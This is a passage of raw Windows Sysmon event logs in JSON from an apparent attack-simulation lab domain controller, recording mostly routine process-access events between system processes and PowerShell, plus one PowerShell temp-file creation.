{"EventTime":"2020-08-01 05:52:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5020,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:41.765\r\nSourceProcessGUID: {A837DB8D-0323-5F25-0000-001056960700}\r\nSourceProcessId: 2580\r\nSourceThreadId: 4128\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0329-5F25-0000-00109AAF0900}\r\nTargetProcessId: 3488\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:41.765","SourceProcessGUID":"{A837DB8D-0323-5F25-0000-001056960700}","SourceProcessId":"2580","SourceThreadId":"4128","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0329-5F25-0000-00109AAF0900}","TargetProcessId":"3488","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5021,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:41.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0329-5F25-0000-00109AAF0900}\r\nTargetProcessId: 3488\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:41.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0329-5F25-0000-00109AAF0900}","TargetProcessId":"3488","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5022,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:41.812\r\nProcessGuid: {A837DB8D-0329-5F25-0000-00109AAF0900}\r\nProcessId: 3488\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_fttivrij.n42.ps1\r\nCreationUtcTime: 2020-08-01 05:52:41.812","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:41.812","ProcessGuid":"{A837DB8D-0329-5F25-0000-00109AAF0900}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_fttivrij.n42.ps1","CreationUtcTime":"2020-08-01 05:52:41.812","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5023,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:41.843\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-0329-5F25-0000-00109AAF0900}\r\nTargetProcessId: 3488\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:41.843","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-0329-5F25-0000-00109AAF0900}","TargetProcessId":"3488","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5024,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:41.843\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-0329-5F25-0000-00109AAF0900}\r\nTargetProcessId: 3488\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:41.843","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-0329-5F25-0000-00109AAF0900}","TargetProcessId":"3488","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5025,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.140\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.140","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5026,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.140\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.140","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5027,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.140\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.140","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5028,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.156\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 